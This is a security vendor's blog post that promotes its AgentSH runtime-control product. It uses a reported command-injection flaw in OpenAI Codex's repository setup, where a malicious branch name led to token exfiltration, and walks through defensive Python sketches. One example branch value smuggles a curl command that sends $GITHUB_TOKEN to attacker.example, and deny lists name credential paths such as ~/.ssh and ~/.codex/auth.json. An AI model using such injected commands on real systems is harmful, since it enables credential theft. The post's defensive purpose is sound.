A new BeyondTrust writeup describes a command injection vulnerability in OpenAI Codex in which a GitHub branch value could flow into shell-backed repository setup, enabling token theft and exfiltration.

The bug matters. But the more important lesson is not just that untrusted input reached a shell. It is that once the shell ran, it had enough authority to do real damage.

That is the control gap.

The part most people miss: setup is execution

One subtle but important detail in Codex's own documentation is that cloud setup happens before the main agent phase and can access the network. OpenAI also documents that cloud secrets are available during setup and then removed before the agent phase starts.

That means the dangerous phase is not only what the agent does later. It is the bootstrap path itself.

If a branch name, repo-controlled value, or other untrusted input reaches setup and triggers shell behavior there, the blast radius depends on what that setup process is allowed to do:

- what processes it can spawn

- what files it can read

- what environment variables it inherits

- where it can connect on the network



Those are the conditions that determine how bad the outcome can get. The sequence itself is familiar:

- Untrusted input becomes shell behavior.

- The shell inherits real authority.

- A secret is within reach.

- The runtime can still reach the network.

- The secret leaves.

That is the kill chain.

The bug is not the boundary

Input validation is necessary. It is not sufficient.

Prompt rules are useful. They are not enforcement. We wrote more about that in Rule Files Are Not Enforcement.

Audit logs help you reconstruct what happened. They do not stop it.

The boundary that matters is the one between intent and side effects. The moment a coding agent tries to spawn a process, read a file, inherit an environment variable, resolve DNS, or open a socket, you are no longer dealing with model behavior in the abstract. You are dealing with machine authority.

How AgentSH would have changed the outcome

AgentSH would not fix the root cause in Codex's request handling. If a product accepts unsafe input and interpolates it into shell execution, the vendor still needs to patch that bug.
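
As an illustration of the vendor-side fix, here is a minimal Python sketch of the difference between interpolating a branch value into a shell string and passing it as a validated argv element. The function names, the character allowlist, and the example payload are assumptions made for illustration; they are not taken from Codex or from the BeyondTrust writeup.

```python
import re

# Hypothetical, deliberately strict allowlist. Real Git ref rules are broader
# (see `git check-ref-format`); this sketch errs on the side of rejecting.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]{1,200}")


def is_safe_branch(name: str) -> bool:
    """Accept only a conservative character set, no leading '-', no '..'."""
    if not SAFE_BRANCH.fullmatch(name):
        return False
    return not name.startswith("-") and ".." not in name


def unsafe_checkout_command(branch: str) -> str:
    """Anti-pattern: the branch value is pasted into a shell command string."""
    return f"git checkout {branch}"


def safe_checkout_argv(branch: str) -> list[str]:
    """Validate first, then build an argv list that never passes through a shell."""
    if not is_safe_branch(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    return ["git", "checkout", branch]


# Hypothetical malicious branch value, for illustration only.
malicious = "main; curl https://attacker.example/?t=$GITHUB_TOKEN"
```

With the unsafe builder, the `;` in the value survives into the command string, where a shell would treat it as a command separator. With the safe builder, the same value is rejected before any process is started.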

What AgentSH does is break the exploit chain at execution time.

If AgentSH is installed under the actual bootstrap and setup path, not just around the later chat loop, then a malicious branch can still try to exploit the bug, but the runtime no longer gets unlimited authority by default.

Stop the unexpected process tree

A branch name should not cause arbitrary shell behavior.

If setup suddenly spawns an unexpected shell or a follow-on process like curl, bash -c, or some other off-path executable, AgentSH can deny it, require approval, or constrain it based on policy.
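
To make the allow, approve, or deny decision concrete, here is a small Python sketch of a process-spawn policy check. It is not AgentSH's policy format or API; the `SpawnEvent` type, the parent and child names, and the rule tables are all hypothetical.

```python
from dataclasses import dataclass
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"
    APPROVE = "require_approval"
    DENY = "deny"


@dataclass(frozen=True)
class SpawnEvent:
    parent: str             # executable name of the parent process
    child: str              # executable name being spawned
    argv: tuple[str, ...]   # full argument vector of the child


# Hypothetical rule table: which children each setup-phase parent may spawn.
ALLOWED_CHILDREN = {
    "setup": {"git", "npm", "pip"},
    "npm": {"node"},
}
# Hypothetical set of shells that need a human decision instead of a silent allow.
NEEDS_APPROVAL = {"bash", "sh"}


def decide_spawn(event: SpawnEvent) -> Decision:
    """Default-deny: allow known edges, escalate plain shells, deny the rest."""
    if event.child in ALLOWED_CHILDREN.get(event.parent, set()):
        return Decision.ALLOW
    # A shell running a script file may be legitimate; an inline `-c` string is not.
    if event.child in NEEDS_APPROVAL and "-c" not in event.argv:
        return Decision.APPROVE
    return Decision.DENY
```

Under these assumed rules, `setup` spawning `git` is allowed, `setup` spawning `bash install.sh` waits for approval, and `bash -c ...` or a `curl` child of `git` is denied.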

Deny network exfiltration

In the BeyondTrust attack path, the damage came from exfiltration.

Even if a malicious command runs, it still needs a destination. AgentSH can enforce egress policy so setup and agent subprocesses can reach only the domains and methods they actually need.

That is the difference between "the command executed" and "the breach succeeded."
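
A default-deny egress check of this kind can be sketched in a few lines of Python. The host list and the allowed methods below are assumptions chosen for illustration, not a recommended or vendor-supplied policy.

```python
from urllib.parse import urlsplit

# Hypothetical setup-phase egress policy: exact host -> allowed HTTP methods.
EGRESS_ALLOW = {
    # Git's smart HTTP protocol uses POST during fetch, so GET alone is not enough here.
    "github.com": {"GET", "POST"},
    "registry.npmjs.org": {"GET"},
    "pypi.org": {"GET"},
    "files.pythonhosted.org": {"GET"},
}


def egress_allowed(method: str, url: str) -> bool:
    """Allow only HTTPS requests to an exactly matching host with a listed method."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower()
    # Exact host match: "github.com.attacker.example" does not match "github.com".
    return method.upper() in EGRESS_ALLOW.get(host, set())
```

The injected command may still run, but a `POST` to an unlisted domain returns `False` here, which is the point at which exfiltration fails.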

Block reads of sensitive files and token-bearing paths

In local tooling flows, the problem is not only transient tokens in a cloud environment. It is also the credential material on the developer machine or runner.

If a tool can read ~/.codex/auth.json, ~/.ssh, cloud credential files, or .env files, then command injection quickly becomes credential theft. AgentSH can constrain which processes can read which files.
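
The following Python sketch shows one way a read-deny rule over credential paths could be evaluated. The glob list, the `~/.aws` entry standing in for "cloud credential files", and the default home directory are assumptions; real enforcement would also have to resolve symlinks and happen at the OS level rather than in application code.

```python
import fnmatch
import posixpath

# Hypothetical deny list. Note that fnmatch's `*` also matches `/`,
# so each pattern covers nested paths as well.
DENY_READ_GLOBS = [
    "~/.codex/*",
    "~/.ssh/*",
    "~/.aws/*",     # assumed example of a cloud credential directory
    "*/.env",
    "*/.env.*",
]


def read_denied(path: str, home: str = "/home/dev") -> bool:
    """Return True if a normalized absolute path matches any deny pattern."""
    # Collapse `..` segments so traversal cannot sidestep the patterns.
    normalized = posixpath.normpath(path)
    for pattern in DENY_READ_GLOBS:
        if pattern.startswith("~"):
            pattern = home + pattern[1:]
        if fnmatch.fnmatchcase(normalized, pattern):
            return True
    return False
```

A per-process version of the same idea would key the deny list on the requesting executable, so that a trusted component could read a path that an injected subprocess could not.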

Scope environment variables per process

This is the part too many defenses miss.

Once a process starts, most systems let it inherit a huge amount of ambient authority through environment variables: API keys, base URLs, proxy settings, cloud credentials, and internal endpoints.

AgentSH can decide which process gets which environment variables.

So even if an injected subprocess runs, it does not automatically inherit the same secret context as the trusted component that was supposed to perform the original task.
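
Per-process environment scoping can be illustrated with Python's standard `subprocess` module, which starts a child with exactly the environment passed via `env=`. The allowlist table and the variable names (`GITHUB_TOKEN`, `OPENAI_API_KEY`) are hypothetical examples, and this is a sketch of the idea rather than how AgentSH implements it.

```python
import subprocess

# Hypothetical mapping: which variable names each executable may inherit.
ENV_ALLOW = {
    "git": {"PATH", "HOME", "GITHUB_TOKEN"},
    "default": {"PATH", "HOME"},
}


def scoped_env(executable: str, parent_env: dict[str, str]) -> dict[str, str]:
    """Return only the variables this executable is allowed to see."""
    allowed = ENV_ALLOW.get(executable, ENV_ALLOW["default"])
    return {k: v for k, v in parent_env.items() if k in allowed}


def run_scoped(argv: list[str], parent_env: dict[str, str]) -> subprocess.CompletedProcess:
    """Launch argv with a filtered environment instead of the full parent one."""
    return subprocess.run(
        argv,
        env=scoped_env(argv[0], parent_env),
        capture_output=True,
        text=True,
        check=False,
    )


# Placeholder values for illustration only.
parent = {
    "PATH": "/usr/bin",
    "HOME": "/home/dev",
    "GITHUB_TOKEN": "example-token",
    "OPENAI_API_KEY": "example-key",
}
```

Here `scoped_env("git", parent)` keeps `GITHUB_TOKEN`, while `scoped_env("curl", parent)` contains only `PATH` and `HOME`, so an injected `curl` has no token to send.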

The bug was command injection.

The damage came from inherited authority.

Capture the side effect that actually matters

This class of attack is easy to hide in plain sight because the human-visible prompt can look normal while the real action happens below it in the shell, subprocess tree, file reads, and network calls.

Execution-layer telemetry changes that. Instead of asking what the prompt looked like, you can ask:

- Why did bootstrap spawn that process?

- Why did that process read this credential path?

- Why did it connect to that domain?

- Why did that environment variable exist in that process at all?

That is much closer to the truth of the incident.
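
As a rough sketch of what answering those questions could look like, the Python below models execution events as records and queries them. The `ExecEvent` schema, the field names, and the sample events are invented for illustration and do not describe any real telemetry format.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ExecEvent:
    pid: int
    ppid: int
    exe: str
    kind: str    # "spawn", "file_read", or "connect"
    target: str  # command line, file path, or destination domain


def ancestry(events: list[ExecEvent], pid: int) -> list[str]:
    """Walk spawn events upward to show which chain of processes led to `pid`."""
    spawned = {e.pid: e for e in events if e.kind == "spawn"}
    chain, seen = [], set()
    while pid in spawned and pid not in seen:
        seen.add(pid)
        chain.append(spawned[pid].exe)
        pid = spawned[pid].ppid
    return list(reversed(chain))


def unexpected_connections(events: list[ExecEvent], allowed: set[str]) -> list[ExecEvent]:
    """Return connect events whose destination is outside the allowed set."""
    return [e for e in events if e.kind == "connect" and e.target not in allowed]


# Hypothetical trace of a setup phase that was hijacked.
events = [
    ExecEvent(100, 1, "setup.sh", "spawn", "setup.sh"),
    ExecEvent(102, 100, "sh", "spawn", "sh -c ..."),
    ExecEvent(103, 102, "curl", "spawn", "curl ..."),
    ExecEvent(103, 102, "curl", "file_read", "/home/dev/.codex/auth.json"),
    ExecEvent(103, 102, "curl", "connect", "attacker.example"),
]
```

For this sample trace, `ancestry(events, 103)` returns the chain from `setup.sh` through `sh` to `curl`, and `unexpected_connections(events, {"github.com"})` surfaces the single connection to `attacker.example`.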

What the policy surface looks like for this class of attack

A practical policy for this kind of runtime should look something like this:

- allow repo checkout only to approved GitHub endpoints

- allow dependency installation only to approved registries

- deny all other outbound domains during setup by default

- restrict HTTP methods so arbitrary POST exfiltration is blocked

- deny reads of ~/.codex/**, ~/.ssh/**, cloud credential files, and .env* unless explicitly required

- scope environment variables so only the intended process gets the intended secret

- require approval for risky shells, subprocess chains, or networked commands outside a trusted set

That is not security theater. It is what it means to remove ambient authority from an AI runtime.

If you want the broader version of that argument, see Bugs Happen. Agents Still Run.

The honest caveat

For a fully vendor-managed cloud product, AgentSH protects the runtime only if it is actually installed under the path where setup and task execution occur. If a third-party service owns the bootstrap environment and you do not control it, you cannot enforce below it from the outside.

But for local coding agents, internal runners, self-hosted agent infrastructure, and sandbox platforms, this is exactly the layer you can control.

Security for agents has to start where side effects start

The BeyondTrust writeup is a useful reminder that AI coding agents are not just chat interfaces with better UX. They are execution environments with credentials, network reach, and real consequences.

The lesson is not merely "escape your shell arguments." Of course you should.

The lesson is that one escaping mistake should not be enough to turn a branch name into a token theft path.

That only happens when the runtime inherits too much authority.

Because the prompt is not the perimeter.

Built by Canyon Road

We build Beacon and AgentSH to give security teams runtime control over AI tools and agents, whether supervised on endpoints or running unsupervised at scale. Policy enforced at the point of execution, not the prompt.
